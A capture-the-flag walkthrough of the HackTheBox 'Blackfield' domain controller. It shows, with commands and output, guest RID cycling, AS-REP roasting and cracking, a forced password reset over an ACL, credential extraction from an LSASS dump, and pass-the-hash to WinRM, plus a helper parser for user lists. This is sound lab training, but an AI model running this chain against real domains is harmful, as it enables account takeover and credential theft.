Blackfield
AD box on HTB.

Enumeration:
Port Scanning:
We will start with nmap scanning:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Blackfield]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 10.129.229.17
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-10 15:21 +03
Nmap scan report for 10.129.229.17
Host is up, received echo-reply ttl 127 (0.13s latency).
Scanned at 2025-09-10 15:21:52 +03 for 148s
Not shown: 65527 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-09-10 19:22:36Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Fewer ports this time, but DNS, Kerberos, LDAP (389, plus the global catalog on 3268), SMB and WinRM together on one host is the signature of a domain controller.
The FQDN (fully qualified domain name) is already visible in the nmap output (host DC01, domain BLACKFIELD.local), but netexec shows it more directly:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Blackfield]
└─$ netexec smb 10.129.229.17
SMB 10.129.229.17 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
I add the hostname, the FQDN and the domain name to the hosts file, all pointing at the target, so that Kerberos and LDAP tooling can resolve them:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Blackfield]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
<snipped>
10.129.229.17 DC01.BLACKFIELD.local BLACKFIELD.local DC01
The guest account gets no interesting share permissions:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Blackfield]
└─$ netexec smb dc01.blackfield.local -u 'guest' -p '' --shares
SMB 10.129.229.17 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.129.229.17 445 DC01 [+] BLACKFIELD.local\guest:
SMB 10.129.229.17 445 DC01 [*] Enumerated shares
SMB 10.129.229.17 445 DC01 Share Permissions Remark
SMB 10.129.229.17 445 DC01 ----- ----------- ------
SMB 10.129.229.17 445 DC01 ADMIN$ Remote Admin
SMB 10.129.229.17 445 DC01 C$ Default share
SMB 10.129.229.17 445 DC01 forensic Forensic / Audit share.
SMB 10.129.229.17 445 DC01 IPC$ READ Remote IPC
SMB 10.129.229.17 445 DC01 NETLOGON Logon server share
SMB 10.129.229.17 445 DC01 profiles$ READ
SMB 10.129.229.17 445 DC01 SYSVOL Logon server share
Guest does have READ on IPC$, though, and that is enough to talk to the named pipes behind it (lsarpc, samr) and enumerate the domain's users. profiles$ is readable too and worth a look.
AS-REP Roasting:
Two tools do this the same way, impacket-lookupsid and netexec --rid-brute; both runs are shown here:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Blackfield]
└─$ impacket-lookupsid blackfield.local/guest@10.129.229.17 -no-pass
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Brute forcing SIDs at 10.129.229.17
[*] StringBinding ncacn_np:10.129.229.17[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4194615774-2175524697-3563712290
498: BLACKFIELD\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: BLACKFIELD\Administrator (SidTypeUser)
501: BLACKFIELD\Guest (SidTypeUser)
502: BLACKFIELD\krbtgt (SidTypeUser)
512: BLACKFIELD\Domain Admins (SidTypeGroup)
513: BLACKFIELD\Domain Users (SidTypeGroup)
514: BLACKFIELD\Domain Guests (SidTypeGroup)
515: BLACKFIELD\Domain Computers (SidTypeGroup)
516: BLACKFIELD\Domain Controllers (SidTypeGroup)
517: BLACKFIELD\Cert Publishers (SidTypeAlias)
518: BLACKFIELD\Schema Admins (SidTypeGroup)
519: BLACKFIELD\Enterprise Admins (SidTypeGroup)
520: BLACKFIELD\Group Policy Creator Owners (SidTypeGroup)
521: BLACKFIELD\Read-only Domain Controllers (SidTypeGroup)
522: BLACKFIELD\Cloneable Domain Controllers (SidTypeGroup)
525: BLACKFIELD\Protected Users (SidTypeGroup)
526: BLACKFIELD\Key Admins (SidTypeGroup)
527: BLACKFIELD\Enterprise Key Admins (SidTypeGroup)
553: BLACKFIELD\RAS and IAS Servers (SidTypeAlias)
571: BLACKFIELD\Allowed RODC Password Replication Group (SidTypeAlias)
572: BLACKFIELD\Denied RODC Password Replication Group (SidTypeAlias)
1000: BLACKFIELD\DC01$ (SidTypeUser)
1101: BLACKFIELD\DnsAdmins (SidTypeAlias)
1102: BLACKFIELD\DnsUpdateProxy (SidTypeGroup)
1103: BLACKFIELD\audit2020 (SidTypeUser)
1104: BLACKFIELD\support (SidTypeUser)
1105: BLACKFIELD\BLACKFIELD764430 (SidTypeUser)
<snipped>
1412: BLACKFIELD\BLACKFIELD438814 (SidTypeUser)
1413: BLACKFIELD\svc_backup (SidTypeUser)
1414: BLACKFIELD\lydericlefebvre (SidTypeUser)
1415: BLACKFIELD\PC01$ (SidTypeUser)
1416: BLACKFIELD\PC02$ (SidTypeUser)
1417: BLACKFIELD\PC03$ (SidTypeUser)
1418: BLACKFIELD\PC04$ (SidTypeUser)
1419: BLACKFIELD\PC05$ (SidTypeUser)
1420: BLACKFIELD\PC06$ (SidTypeUser)
1421: BLACKFIELD\PC07$ (SidTypeUser)
1422: BLACKFIELD\PC08$ (SidTypeUser)
1423: BLACKFIELD\PC09$ (SidTypeUser)
1424: BLACKFIELD\PC10$ (SidTypeUser)
1425: BLACKFIELD\PC11$ (SidTypeUser)
1426: BLACKFIELD\PC12$ (SidTypeUser)
1427: BLACKFIELD\PC13$ (SidTypeUser)
1428: BLACKFIELD\SRV-WEB$ (SidTypeUser)
1429: BLACKFIELD\SRV-FILE$ (SidTypeUser)
1430: BLACKFIELD\SRV-EXCHANGE$ (SidTypeUser)
1431: BLACKFIELD\SRV-INTRANET$ (SidTypeUser)
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Blackfield]
└─$ netexec smb dc01.blackfield.local -u 'guest' -p '' --rid-brute
SMB 10.129.229.17 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.129.229.17 445 DC01 [+] BLACKFIELD.local\guest:
SMB 10.129.229.17 445 DC01 498: BLACKFIELD\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.229.17 445 DC01 500: BLACKFIELD\Administrator (SidTypeUser)
SMB 10.129.229.17 445 DC01 501: BLACKFIELD\Guest (SidTypeUser)
SMB 10.129.229.17 445 DC01 502: BLACKFIELD\krbtgt (SidTypeUser)
SMB 10.129.229.17 445 DC01 512: BLACKFIELD\Domain Admins (SidTypeGroup)
SMB 10.129.229.17 445 DC01 513: BLACKFIELD\Domain Users (SidTypeGroup)
SMB 10.129.229.17 445 DC01 514: BLACKFIELD\Domain Guests (SidTypeGroup)
SMB 10.129.229.17 445 DC01 515: BLACKFIELD\Domain Computers (SidTypeGroup)
SMB 10.129.229.17 445 DC01 516: BLACKFIELD\Domain Controllers (SidTypeGroup)
SMB 10.129.229.17 445 DC01 517: BLACKFIELD\Cert Publishers (SidTypeAlias)
SMB 10.129.229.17 445 DC01 518: BLACKFIELD\Schema Admins (SidTypeGroup)
SMB 10.129.229.17 445 DC01 519: BLACKFIELD\Enterprise Admins (SidTypeGroup)
SMB 10.129.229.17 445 DC01 520: BLACKFIELD\Group Policy Creator Owners (SidTypeGroup)
SMB 10.129.229.17 445 DC01 521: BLACKFIELD\Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.229.17 445 DC01 522: BLACKFIELD\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.129.229.17 445 DC01 525: BLACKFIELD\Protected Users (SidTypeGroup)
SMB 10.129.229.17 445 DC01 526: BLACKFIELD\Key Admins (SidTypeGroup)
SMB 10.129.229.17 445 DC01 527: BLACKFIELD\Enterprise Key Admins (SidTypeGroup)
SMB 10.129.229.17 445 DC01 553: BLACKFIELD\RAS and IAS Servers (SidTypeAlias)
SMB 10.129.229.17 445 DC01 571: BLACKFIELD\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.129.229.17 445 DC01 572: BLACKFIELD\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.129.229.17 445 DC01 1000: BLACKFIELD\DC01$ (SidTypeUser)
SMB 10.129.229.17 445 DC01 1101: BLACKFIELD\DnsAdmins (SidTypeAlias)
SMB 10.129.229.17 445 DC01 1102: BLACKFIELD\DnsUpdateProxy (SidTypeGroup)
SMB 10.129.229.17 445 DC01 1103: BLACKFIELD\audit2020 (SidTypeUser)
SMB 10.129.229.17 445 DC01 1104: BLACKFIELD\support (SidTypeUser)
SMB 10.129.229.17 445 DC01 1105: BLACKFIELD\BLACKFIELD764430 (SidTypeUser)
<snipped>
SMB 10.129.229.17 445 DC01 1412: BLACKFIELD\BLACKFIELD438814 (SidTypeUser)
SMB 10.129.229.17 445 DC01 1413: BLACKFIELD\svc_backup (SidTypeUser)
SMB 10.129.229.17 445 DC01 1414: BLACKFIELD\lydericlefebvre (SidTypeUser)
SMB 10.129.229.17 445 DC01 1415: BLACKFIELD\PC01$ (SidTypeUser)
SMB 10.129.229.17 445 DC01 1416: BLACKFIELD\PC02$ (SidTypeUser)
SMB 10.129.229.17 445 DC01 1417: BLACKFIELD\PC03$ (SidTypeUser)
SMB 10.129.229.17 445 DC01 1418: BLACKFIELD\PC04$ (SidTypeUser)
SMB 10.129.229.17 445 DC01 1419: BLACKFIELD\PC05$ (SidTypeUser)
SMB 10.129.229.17 445 DC01 1420: BLACKFIELD\PC06$ (SidTypeUser)
SMB 10.129.229.17 445 DC01 1421: BLACKFIELD\PC07$ (SidTypeUser)
SMB 10.129.229.17 445 DC01 1422: BLACKFIELD\PC08$ (SidTypeUser)
SMB 10.129.229.17 445 DC01 1423: BLACKFIELD\PC09$ (SidTypeUser)
SMB 10.129.229.17 445 DC01 1424: BLACKFIELD\PC10$ (SidTypeUser)
SMB 10.129.229.17 445 DC01 1425: BLACKFIELD\PC11$ (SidTypeUser)
SMB 10.129.229.17 445 DC01 1426: BLACKFIELD\PC12$ (SidTypeUser)
SMB 10.129.229.17 445 DC01 1427: BLACKFIELD\PC13$ (SidTypeUser)
SMB 10.129.229.17 445 DC01 1428: BLACKFIELD\SRV-WEB$ (SidTypeUser)
SMB 10.129.229.17 445 DC01 1429: BLACKFIELD\SRV-FILE$ (SidTypeUser)
SMB 10.129.229.17 445 DC01 1430: BLACKFIELD\SRV-EXCHANGE$ (SidTypeUser)
SMB 10.129.229.17 445 DC01 1431: BLACKFIELD\SRV-INTRANET$ (SidTypeUser)
This is RID cycling. Every domain has its own SID (here S-1-5-21-4194615774-2175524697-3563712290), and every object in the domain gets a SID of the form domain SID plus a relative identifier (RID). The tool first obtains the domain SID over the lsarpc pipe, then asks the DC to translate candidate SIDs back to names one RID at a time: RID 500 is the built-in Administrator, so it checks whether S-1-5-21-4194615774-2175524697-3563712290-500 resolves, and continues upward through the range where new accounts are created (1000 and above). Guest can do this because SID-to-name translation is allowed over the session it has.
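As an added example (my code, not part of the original writeup), here is a small Python parser for the output of either tool above. It pulls the RID, account name and SID type out of each line, rebuilds each object's full SID from the domain SID when that line is present (the reverse of the lookup the tools perform), and separates real user accounts from machine accounts, which is worth doing before feeding a list to GetNPUsers. The sample text is constructed to mirror both formats shown above, using the page's domain SID and account names.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# "1103: BLACKFIELD\audit2020 (SidTypeUser)" wherever it sits in the line, so one
# pattern covers impacket-lookupsid and netexec --rid-brute output alike.
_ENTRY = re.compile(r"(\d+):\s+([^\\\s]+)\\(.+?)\s+\((SidType\w+)\)\s*$")
_DOMAIN_SID = re.compile(r"Domain SID is:\s+(S-1-5-21-\d+-\d+-\d+)")


@dataclass(frozen=True)
class RidEntry:
    rid: int
    domain: str
    name: str
    sid_type: str
    sid: Optional[str]  # full SID, only when the domain SID appeared in the output

    @property
    def is_machine(self) -> bool:
        # Computer accounts are SidTypeUser objects whose sAMAccountName ends in '$'
        return self.sid_type == "SidTypeUser" and self.name.endswith("$")


def parse_rid_cycle(output: str) -> List[RidEntry]:
    """Parse lookupsid / rid-brute output; rebuild each object's SID as domain SID + '-' + RID."""
    m = _DOMAIN_SID.search(output)
    domain_sid = m.group(1) if m else None
    entries = []
    for line in output.splitlines():
        m = _ENTRY.search(line)
        if not m:
            continue
        rid, domain, name, sid_type = m.groups()
        sid = f"{domain_sid}-{rid}" if domain_sid else None
        entries.append(RidEntry(int(rid), domain, name, sid_type, sid))
    return entries


def user_names(entries: List[RidEntry], include_machines: bool = False) -> List[str]:
    """Account names for GetNPUsers -usersfile; machine accounts are dropped unless asked for."""
    return [e.name for e in entries
            if e.sid_type == "SidTypeUser" and (include_machines or not e.is_machine)]


# Constructed sample mixing a lookupsid-style header and lines with netexec-style lines.
SAMPLE = """\
[*] Domain SID is: S-1-5-21-4194615774-2175524697-3563712290
500: BLACKFIELD\\Administrator (SidTypeUser)
512: BLACKFIELD\\Domain Admins (SidTypeGroup)
1000: BLACKFIELD\\DC01$ (SidTypeUser)
1103: BLACKFIELD\\audit2020 (SidTypeUser)
SMB  10.129.229.17  445  DC01  1104: BLACKFIELD\\support (SidTypeUser)
SMB  10.129.229.17  445  DC01  1415: BLACKFIELD\\PC01$ (SidTypeUser)
"""

if __name__ == "__main__":
    entries = parse_rid_cycle(SAMPLE)
    for e in entries:
        print(f"{e.sid}  {e.name:<20} {e.sid_type}" + ("  [machine]" if e.is_machine else ""))
    print("GetNPUsers candidates:", user_names(entries))
```

Machine accounts are kept out of the default list because they very rarely have preauthentication disabled, and leaving them in only adds noise to the GetNPUsers run; pass include_machines=True if you want the complete set.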
Saving the lookupsid output to temp.txt, a short pipeline pulls out just the user accounts (in that format field 2 is DOMAIN\name, which is why awk '{print $2}' works for lookupsid output and would not for netexec's):
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Blackfield]
└─$ cat temp.txt | grep SidTypeUser | awk '{print $2}' | cut -d '\' -f 2 > users.txt
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Blackfield]
└─$ cat users.txt
Administrator
Guest
krbtgt
DC01$
audit2020
support
BLACKFIELD764430
etc...
Next I check whether any of those accounts has "Do not require Kerberos preauthentication" (UF_DONT_REQUIRE_PREAUTH) set. For such an account the KDC hands an AS-REP to anyone who asks for one, and part of that reply is encrypted with a key derived from the user's password, so it can be cracked offline. impacket-GetNPUsers requests one for every name in the list:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Blackfield]
└─$ impacket-GetNPUsers blackfield.local/ -usersfile users.txt
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Guest doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User DC01$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User audit2020 doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$support@BLACKFIELD.LOCAL:0a59b34b164714e0e6ce50ca664ddd8d$229f07301b37e2c13579dbf33660737f3613f60b0b9bf57625bf4a6f3e9d3e830b1e06a882603f0a5cf24529f410f92f79b
78f7e68ebdcd6366fa0590be12dee033ff12b15191d2f025638f527a01a8b95163c444b40249e8e4c301629c76651a05a6067a030780e4c728887a385420564fceb2dab344c3cc6d748410fca0954224df3cdd35880
9b67f2ae596f39c4042a29515d1f4da4c32cfe1e2994a293564ab4f69b75b04005f6714f62d8c159d3bbe02055985c706d5bb884660e19cf9e5b15941e53395cbc1d1124cb09da4f7c5726f13890cdc25de3617bdb3
a800129b295a587caa17655cb8c81db782d6b60c5******
[-] User BLACKFIELD764430 doesn't have UF_DONT_REQUIRE_PREAUTH set
<snipped>
One account, support, is AS-REP roastable (the KDC_ERR_CLIENT_REVOKED line is krbtgt, which is disabled by design). GetNPUsers already prints the ticket in hashcat's $krb5asrep$23$ format, so I save that line to support.hash and hand it to hashcat, which auto-detects mode 18200 (Kerberos 5 AS-REP, etype 23).
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Blackfield]
└─$ hashcat support.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting in autodetect mode
<snipped>
$krb5asrep$23$support@BLACKFIELD.LOCAL:0a59b34b164714e0e6ce50ca664ddd8d$229f07301b37e2c13579dbf33660737f3613f60b0b9bf57625bf4a6f3e9d3e830b1e06a882603f0a5cf24529f410f92f79b
78f7e68ebdcd6366fa0590be12dee033ff12b15191d2f025638f527a01a8b95163c444b40249e8e4c301629c76651a05a6067a030780e4c728887a385420564fceb2dab344c3cc6d748410fca0954224df3cdd35880
9b67f2ae596f39c4042a29515d1f4da4c32cfe1e2994a293564ab4f69b75b04005f6714f62d8c159d3bbe02055985c706d5bb884660e19cf9e5b15941e53395cbc1d1124cb09da4f7c5726f13890cdc25de3617bdb3
a800129b295a587caa17655cb8c81db782d6b60c5******:#00^Black******
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$support@BLACKFIELD.LOCAL:0a59b34b1647...******
Time.Started.....: Wed Sep 10 15:45:20 2025 (10 secs)
Time.Estimated...: Wed Sep 10 15:45:30 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1538.1 kH/s (0.93ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 14337024/14344385 (99.95%)
Rejected.........: 0/14337024 (0.00%)
Restore.Point....: 14333952/14344385 (99.93%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: #1crapper -> "$&(!=
Hardware.Mon.#1..: Util: 33%
<snipped>
BloodHound:
With a valid domain account we can map the domain. netexec has a built-in BloodHound collector (the --bloodhound flag on the ldap protocol) that writes the JSON files into a zip, which is then uploaded to the BloodHound GUI:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Blackfield]
└─$ netexec ldap dc01.blackfield.local -u support -p '#00^BlackKnight' --bloodhound -c all --dns-server 10.129.229.17
LDAP 10.129.229.17 389 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:BLACKFIELD.local)
LDAP 10.129.229.17 389 DC01 [+] BLACKFIELD.local\support:#00^BlackKnight
LDAP 10.129.229.17 389 DC01 Resolved collection methods: dcom, objectprops, acl, session, group, localadmin, container, psremote, rdp, trusts
LDAP 10.129.229.17 389 DC01 Done in 00M 39S
LDAP 10.129.229.17 389 DC01 Compressing output into /home/kali/.nxc/logs/DC01_10.129.229.17_2025-09-10_154846_bloodhound.zip
┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Blackfield/bloodhound]
└─$ unzip DC01_10.129.229.17_2025-09-10_154846_bloodhound.zip
Archive: DC01_10.129.229.17_2025-09-10_154846_bloodhound.zip
extracting: DC01_10.129.229.17_2025-09-10_154846_users.json
extracting: DC01_10.129.229.17_2025-09-10_154846_gpos.json
extracting: DC01_10.129.229.17_2025-09-10_154846_groups.json
extracting: DC01_10.129.229.17_2025-09-10_154846_ous.json
extracting: DC01_10.129.229.17_2025-09-10_154846_computers.json
extracting: DC01_10.129.229.17_2025-09-10_154846_domains.json
extracting: DC01_10.129.229.17_2025-09-10_154846_containers.json
Start BloodHound (the Kali package brings up neo4j first):
┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Blackfield/bloodhound]
└─$ sudo bloodhound
[sudo] password for kali:
Starting neo4j
Neo4j is not running.
Directories in use:
home: /usr/share/neo4j
config: /usr/share/neo4j/conf
logs: /etc/neo4j/logs
plugins: /usr/share/neo4j/plugins
import: /usr/share/neo4j/import
data: /etc/neo4j/data
certificates: /usr/share/neo4j/certificates
licenses: /usr/share/neo4j/licenses
run: /var/lib/neo4j/run
Starting Neo4j.
Started neo4j (pid:20694). It is available at http://localhost:7474
There may be a short delay until the server is ready.
................................................
Bloodhound will start
IMPORTANT: It will take time, please wait...
<snipped>
opening http://127.0.0.1:8080
Abuse ACL:

Marking support as owned and looking at its outbound object control, BloodHound shows a ForceChangePassword edge from support to audit2020: support holds the User-Force-Change-Password extended right on that object, so it can reset audit2020's password without knowing the current one. On a real engagement this is a destructive action (the user is locked out of their own account) and should be agreed with the client first; here I just do it with bloodyAD:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Blackfield]
└─$ bloodyAD --host 10.129.229.17 -d blackfield.local -u support -p '#00^BlackKnight' set password 'audit2020' 'Caesar3#'
[+] Password changed successfully!
Verify that the new password works:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Blackfield]
└─$ nxc smb dc01.blackfield.local -u audit2020 -p 'Caesar3#'
SMB 10.129.229.17 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.129.229.17 445 DC01 [+] BLACKFIELD.local\audit2020:Caesar3#
Enumerating the shares again, this time as audit2020:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Blackfield]
└─$ nxc smb dc01.blackfield.local -u audit2020 -p 'Caesar3#' --shares
SMB 10.129.229.17 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.129.229.17 445 DC01 [+] BLACKFIELD.local\audit2020:Caesar3#
SMB 10.129.229.17 445 DC01 [*] Enumerated shares
SMB 10.129.229.17 445 DC01 Share Permissions Remark
SMB 10.129.229.17 445 DC01 ----- ----------- ------
SMB 10.129.229.17 445 DC01 ADMIN$ Remote Admin
SMB 10.129.229.17 445 DC01 C$ Default share
SMB 10.129.229.17 445 DC01 forensic READ Forensic / Audit share.
SMB 10.129.229.17 445 DC01 IPC$ READ Remote IPC
SMB 10.129.229.17 445 DC01 NETLOGON READ Logon server share
SMB 10.129.229.17 445 DC01 profiles$ READ
SMB 10.129.229.17 445 DC01 SYSVOL READ Logon server share
audit2020 has READ on the forensic share, which guest did not. Let's see what is in it:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Blackfield]
└─$ impacket-smbclient blackfield.local/audit2020:'Caesar3#'@10.129.229.17
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Type help for list of commands
# shares
ADMIN$
C$
forensic
IPC$
NETLOGON
profiles$
SYSVOL
# use forensic
# ls
drw-rw-rw- 0 Sun Feb 23 18:10:16 2020 .
drw-rw-rw- 0 Sun Feb 23 18:10:16 2020 ..
drw-rw-rw- 0 Sun Feb 23 21:14:37 2020 commands_output
drw-rw-rw- 0 Thu May 28 23:29:24 2020 memory_analysis
drw-rw-rw- 0 Sat Feb 29 01:30:34 2020 tools
# cd commands_output
# ls
drw-rw-rw- 0 Sun Feb 23 21:14:37 2020 .
drw-rw-rw- 0 Sun Feb 23 21:14:37 2020 ..
-rw-rw-rw- 528 Sun Feb 23 21:12:54 2020 domain_admins.txt
-rw-rw-rw- 962 Sun Feb 23 21:12:54 2020 domain_groups.txt
-rw-rw-rw- 16454 Sat Feb 29 01:32:17 2020 domain_users.txt
-rw-rw-rw- 518202 Sun Feb 23 21:12:54 2020 firewall_rules.txt
-rw-rw-rw- 1782 Sun Feb 23 21:12:54 2020 ipconfig.txt
-rw-rw-rw- 3842 Sun Feb 23 21:12:54 2020 netstat.txt
-rw-rw-rw- 3976 Sun Feb 23 21:12:54 2020 route.txt
-rw-rw-rw- 4550 Sun Feb 23 21:12:54 2020 systeminfo.txt
-rw-rw-rw- 9990 Sun Feb 23 21:12:54 2020 tasklist.txt
# mget *
[*] Downloading domain_admins.txt
[*] Downloading domain_groups.txt
[*] Downloading domain_users.txt
[*] Downloading firewall_rules.txt
[*] Downloading ipconfig.txt
[*] Downloading netstat.txt
[*] Downloading route.txt
[*] Downloading systeminfo.txt
[*] Downloading tasklist.txt
# cd ..
# cd tools
# ls
drw-rw-rw- 0 Sat Feb 29 01:30:34 2020 .
drw-rw-rw- 0 Sat Feb 29 01:30:34 2020 ..
drw-rw-rw- 0 Sat Feb 29 01:30:34 2020 sleuthkit-4.8.0-win32
drw-rw-rw- 0 Sat Feb 29 01:30:35 2020 sysinternals
drw-rw-rw- 0 Sat Feb 29 01:30:35 2020 volatility
# cd ..
# cd memory_analysis
# ls
drw-rw-rw- 0 Thu May 28 23:29:24 2020 .
drw-rw-rw- 0 Thu May 28 23:29:24 2020 ..
-rw-rw-rw- 37876530 Thu May 28 23:29:24 2020 conhost.zip
-rw-rw-rw- 24962333 Thu May 28 23:29:24 2020 ctfmon.zip
-rw-rw-rw- 23993305 Thu May 28 23:29:24 2020 dfsrs.zip
-rw-rw-rw- 18366396 Thu May 28 23:29:24 2020 dllhost.zip
-rw-rw-rw- 8810157 Thu May 28 23:29:24 2020 ismserv.zip
-rw-rw-rw- 41936098 Thu May 28 23:29:24 2020 lsass.zip
-rw-rw-rw- 64288607 Thu May 28 23:29:24 2020 mmc.zip
-rw-rw-rw- 13332174 Thu May 28 23:29:24 2020 RuntimeBroker.zip
-rw-rw-rw- 131983313 Thu May 28 23:29:24 2020 ServerManager.zip
-rw-rw-rw- 33141744 Thu May 28 23:29:24 2020 sihost.zip
-rw-rw-rw- 33756344 Thu May 28 23:29:24 2020 smartscreen.zip
-rw-rw-rw- 14408833 Thu May 28 23:29:24 2020 svchost.zip
-rw-rw-rw- 34631412 Thu May 28 23:29:24 2020 taskhostw.zip
-rw-rw-rw- 14255089 Thu May 28 23:29:24 2020 winlogon.zip
-rw-rw-rw- 4067425 Thu May 28 23:29:24 2020 wlms.zip
-rw-rw-rw- 18303252 Thu May 28 23:29:24 2020 WmiPrvSE.zip
# get lsass.zip
# exit
Somebody ran a forensic collection on this DC: commands_output holds ordinary triage text (domain users and groups, netstat, tasklist, firewall rules), tools holds Sleuthkit, Sysinternals and Volatility, and memory_analysis holds a memory dump per process. The one that matters is lsass.zip. LSASS keeps the credentials of every logged-on session in memory, so a dump of it usually yields NT hashes or even plaintext passwords that can be reused for lateral movement.
Lateral Movement to svc_backup:
mimikatz (sekurlsa::minidump) on a Windows box would parse this; pypykatz does the same natively on Linux. After unzipping lsass.zip the dump itself is lsass.DMP:
┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Blackfield/analysis]
└─$ pypykatz lsa minidump lsass.DMP
INFO:pypykatz:Parsing file lsass.DMP
FILE: ======== lsass.DMP =======
== LogonSession ==
authentication_id 406458 (633ba)
session_id 2
username svc_backup
domainname BLACKFIELD
logon_server DC01
logon_time 2020-02-23T18:00:03.423728+00:00
sid S-1-5-21-4194615774-2175524697-3563712290-1413
luid 406458
== MSV ==
Username: svc_backup
Domain: BLACKFIELD
LM: NA
NT: 9658d1d1dcd9250115e2205d9f48400d
SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
DPAPI: a03cd8e9d30171f3cfe8caad92fef62100000000
== WDIGEST [633ba]==
username svc_backup
domainname BLACKFIELD
password None
password (hex)
== Kerberos ==
Username: svc_backup
Domain: BLACKFIELD.LOCAL
== WDIGEST [633ba]==
username svc_backup
domainname BLACKFIELD
password None
password (hex)
<snipped>
The lsa module with the minidump argument tells pypykatz this is a minidump file rather than a live LSASS process.
The dump holds an NT hash for svc_backup and, further down in the snipped part, hashes for DC01$. The DC01$ ones did not authenticate: machine accounts rotate their password automatically (every 30 days by default), so the hashes in a 2020 dump are stale. The svc_backup hash is the one worth checking, and netexec confirms it is still valid (the --sam option needs local admin, so the [+] line is the only thing it tells us here):
┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Blackfield/analysis]
└─$ nxc smb dc01.blackfield.local -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d --sam
SMB 10.129.229.17 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.129.229.17 445 DC01 [+] BLACKFIELD.local\svc_backup:9658d1d1dcd9250115e2205d9f48400d
BloodHound also shows svc_backup in Remote Management Users, so we can log in over WinRM, passing the hash instead of a password:
┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Blackfield/analysis]
└─$ evil-winrm -i 10.129.229.17 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
